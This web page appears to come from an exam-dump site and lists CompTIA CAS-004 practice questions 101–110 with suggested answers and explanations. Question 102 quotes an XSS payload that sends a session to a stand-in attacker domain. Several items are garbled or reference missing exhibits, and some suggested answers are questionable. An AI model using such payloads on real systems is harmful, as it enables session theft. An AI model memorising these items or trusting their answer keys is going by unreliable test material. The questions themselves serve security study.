ExamGecko
Search Search Login
Home Home / CompTIA / CAS-004

CompTIA CAS-004 Practice Test - Questions Answers, Page 11

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following: ERR_SSL_VERSION_OR_CIPHER_MISMATCH Which of the following is MOST likely the root cause?
Due to locality and budget constraints, an organization's satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility. Which of the following would be the BEST option to implement?
An loT device implements an encryption module built within its SoC where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware Which of the following should the loT manufacture do if the private key is compromised?
A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity Internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but Is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO?
Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?
A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive. Based on the output above, from which of the following process IDs can the analyst begin an investigation?
in a situation where the cost of anti-malware exceeds the potential loss from a malware threat, which of the following is the most cost-effective risk response?
A security officer is requiring all personnel working on a special project to obtain a security clearance requisite with the level of all information being accessed Data on this network must be protected at the same level of each clearance holder The need to know must be vended by the data owner Which of the following should the security officer do to meet these requirements?
An internal security assessor identified large gaps in a company's IT asset inventory system during a monthly asset review. The assessor is aware of an external audit that is underway. In an effort to avoid external findings, the assessor chooses not to report the gaps in the inventory system. Which of the following legal considerations is the assessor directly violating?
An organization is designing a network architecture that must meet the following requirements: Users will only be able to access predefined services. Each user will have a unique allow list defined for access. The system will construct one-to-one subject/object access paths dynamically. Which of the following architectural designs should the organization use to meet these requirements?

Question 101

Report
Export
Collapse

A company that uses AD is migrating services from LDAP to secure LDAP. During the pilot phase, services are not connecting properly to secure LDAP. Block is an except of output from the troubleshooting session:

Which of the following BEST explains why secure LDAP is not working? (Select TWO.)

A.
The clients may not trust idapt by default.
A.
The clients may not trust idapt by default.
Answers
B.
The secure LDAP service is not started, so no connections can be made.
B.
The secure LDAP service is not started, so no connections can be made.
Answers
C.
Danvills.com is under a DDoS-inator attack and cannot respond to OCSP requests.
C.
Danvills.com is under a DDoS-inator attack and cannot respond to OCSP requests.
Answers
D.
Secure LDAP should be running on UDP rather than TCP.
D.
Secure LDAP should be running on UDP rather than TCP.
Answers
E.
The company is using the wrong port. It should be using port 389 for secure LDAP.
E.
The company is using the wrong port. It should be using port 389 for secure LDAP.
Answers
F.
Secure LDAP does not support wildcard certificates.
F.
Secure LDAP does not support wildcard certificates.
Answers
G.
The clients may not trust Chicago by default.
G.
The clients may not trust Chicago by default.
Answers
Suggested answer: A, F

Explanation:

The clients may not trust idapt by default because it is a self-signed certificate authority that is not in the trusted root store of the clients. Secure LDAP does not support wildcard certificates because they do not match the fully qualified domain name of the server. Verified

Reference: https://www.professormesser.com/security-plus/sy0-401/ldap-and-secure-ldap/ , https://www.comptia.org/training/books/casp-cas-004-study-guide

Question 102

Report
Export
Collapse

A threat analyst notices the following URL while going through the HTTP logs.

http://www.safebrowsing~~~/search.asp?q=<script>x=newimage;x.src=”http://baddomain~~~/session;

Which of the following attack types is the threat analyst seeing?

A.
SQL injection
A.
SQL injection
Answers
B.
CSRF
B.
CSRF
Answers
C.
Session hijacking
C.
Session hijacking
Answers
D.
XSS
D.
XSS
Answers
Suggested answer: D

Explanation:

XSS stands for cross-site scripting, which is a type of attack that injects malicious code into a web page that is then executed by the browser of a victim. The URL in the question contains a script tag that tries to execute a JavaScript code from an external source, which is a sign of XSS. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://owasp.org/www-community/attacks/xss/

Question 103

Report
Export
Collapse

The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?

A.
Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier's post-contract renewal with a dedicated risk management team.
A.
Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier's post-contract renewal with a dedicated risk management team.
Answers
B.
Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
B.
Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
Answers
C.
Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.
C.
Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.
Answers
D.
Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier's rating. Report finding units that rely on the suppliers and the various risk teams.
D.
Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier's rating. Report finding units that rely on the suppliers and the various risk teams.
Answers
Suggested answer: D

Explanation:

A governance program that rates suppliers based on their access to data, the type of data, and how they access the data is the best way to manage the risk of handling and security of customer data by third parties. This allows the company to assign key controls that are reviewed and managed based on the supplier's rating and report findings to the relevant units and risk teams. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/third-party-risk-management

Question 104

Report
Export
Collapse

Company A is establishing a contractual with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements

A.
Company A-B SLA v2.docx
A.
Company A-B SLA v2.docx
Answers
B.
Company A OLA v1b.docx
B.
Company A OLA v1b.docx
Answers
C.
Company A MSA v3.docx
C.
Company A MSA v3.docx
Answers
D.
Company A MOU v1.docx
D.
Company A MOU v1.docx
Answers
E.
Company A-B NDA v03.docx
E.
Company A-B NDA v03.docx
Answers
Suggested answer: C

Explanation:

A MSA stands for master service agreement, which is a document that covers the general terms and conditions of a contractual relationship between two parties. It usually includes payment terms, limitation of liability, intellectual property rights, dispute resolution, and other clauses that apply to all services provided by one party to another. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.upcounsel.com/master-service-agreement

Question 105

Report
Export
Collapse

A company requires a task to be carried by more than one person concurrently. This is an example of:

A.
separation of d duties.
A.
separation of d duties.
Answers
B.
dual control
B.
dual control
Answers
C.
least privilege
C.
least privilege
Answers
D.
job rotation
D.
job rotation
Answers
Suggested answer: B

Explanation:

Dual control is a security principle that requires two or more authorized individuals to perform a task concurrently. This reduces the risk of fraud, error, or misuse of sensitive assets or information. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.isaca.org/resources/isaca-journal/issues/2018/volume-1/using-dual-control-to-mitigate-risk

Question 106

Report
Export
Collapse

A health company has reached the physical and computing capabilities in its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare application that process sensitive health and payment information. Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standard for virtualization and cloud computing?

A.
Hybrid IaaS solution in a single-tenancy cloud
A.
Hybrid IaaS solution in a single-tenancy cloud
Answers
B.
Pass solution in a multinency cloud
B.
Pass solution in a multinency cloud
Answers
C.
SaaS solution in a community cloud
C.
SaaS solution in a community cloud
Answers
D.
Private SaaS solution in a single tenancy cloud.
D.
Private SaaS solution in a single tenancy cloud.
Answers
Suggested answer: A

Explanation:

A hybrid IaaS solution in a single-tenancy cloud is the best option for the company to meet the computing demand while complying with healthcare standards for virtualization and cloud computing. A hybrid IaaS solution allows the company to use both on-premises and cloud-based resources to scale up its capacity and performance. A single-tenancy cloud ensures that the company's data and applications are isolated from other customers and have dedicated resources and security controls. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.hhs.gov/hipaa/for-professionals/special-topics/cloud-computing/index.html

Question 107

Report
Export
Collapse

A developer implement the following code snippet.

Which of the following vulnerabilities does the code snippet resolve?

A.
SQL inject
A.
SQL inject
Answers
B.
Buffer overflow
B.
Buffer overflow
Answers
C.
Missing session limit
C.
Missing session limit
Answers
D.
Information leakage
D.
Information leakage
Answers
Suggested answer: A

Explanation:

SQL injection is a type of vulnerability that allows an attacker to execute malicious SQL commands on a database by inserting them into an input field. The code snippet resolves this vulnerability by using parameterized queries, which prevent the input from being interpreted as part of the SQL command. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://owasp.org/www-community/attacks/SQL_Injection

Question 108

Report
Export
Collapse

A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.

Which of the following should the security analyst perform?

A.
Contact the security department at the business partner and alert them to the email event.
A.
Contact the security department at the business partner and alert them to the email event.
Answers
B.
Block the IP address for the business partner at the perimeter firewall.
B.
Block the IP address for the business partner at the perimeter firewall.
Answers
C.
Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
C.
Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
Answers
D.
Configure the email gateway to automatically quarantine all messages originating from the business partner.
D.
Configure the email gateway to automatically quarantine all messages originating from the business partner.
Answers
Suggested answer: A

Explanation:

The best option for the security analyst to perform is to contact the security department at the business partner and alert them to the email event. The email appears to be a phishing attempt that tries to trick the employees into revealing their login credentials by impersonating a legitimate sender. The security department at the business partner should be notified so they can investigate the source and scope of the attack and take appropriate actions to protect their systems and users. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://us-cert.cisa.gov/ncas/tips/ST04-014

Question 109

Report
Export
Collapse

A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief information Security Officer (CISO) must brief board of directors on the potential security concerns related to this migration. The board is concerned about the following.

* Transactions being required by unauthorized individual

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attacker using email to distribute malware and ransom ware.

* Exfiltration of sensitivity company information.

The cloud-based email solution will provide an6-malware, reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the board's concerns for this email migration?

A.
Data loss prevention
A.
Data loss prevention
Answers
B.
Endpoint detection response
B.
Endpoint detection response
Answers
C.
SSL VPN
C.
SSL VPN
Answers
D.
Application whitelisting
D.
Application whitelisting
Answers
Suggested answer: A

Explanation:

Data loss prevention (DLP) is the best option to resolve the board's concerns for this email migration. DLP is a set of tools and policies that aim to prevent unauthorized access, disclosure, or exfiltration of sensitive data. DLP can monitor, filter, encrypt, or block email messages based on predefined rules and criteria, such as content, sender, recipient, attachment, etc. DLP can help protect transactions, customer data, and company information from being compromised by malicious actors or accidental leaks. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://www.csoonline.com/article/3245746/what-is-dlp-data-loss-prevention-and-how-does-it-work.html

Question 110

Report
Export
Collapse

Which of the following BEST sets expectation between the security team and business units within an organization?

A.
Risk assessment
A.
Risk assessment
Answers
B.
Memorandum of understanding
B.
Memorandum of understanding
Answers
C.
Business impact analysis
C.
Business impact analysis
Answers
D.
Business partnership agreement
D.
Business partnership agreement
Answers
E.
Services level agreement
E.
Services level agreement
Answers
Suggested answer: E

Explanation:

A service level agreement (SLA) is the best option to set expectations between the security team and business units within an organization. An SLA is a document that defines the scope, quality, roles, responsibilities, and metrics of a service provided by one party to another. An SLA can help align the security team's objectives and activities with the business units' needs and expectations, as well as establish accountability and communication channels. Verified

Reference: https://www.comptia.org/training/books/casp-cas-004-study-guide , https://searchitchannel.techtarget.com/definition/service-level-agreement

Total 510 questions
Go to page: of 51
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms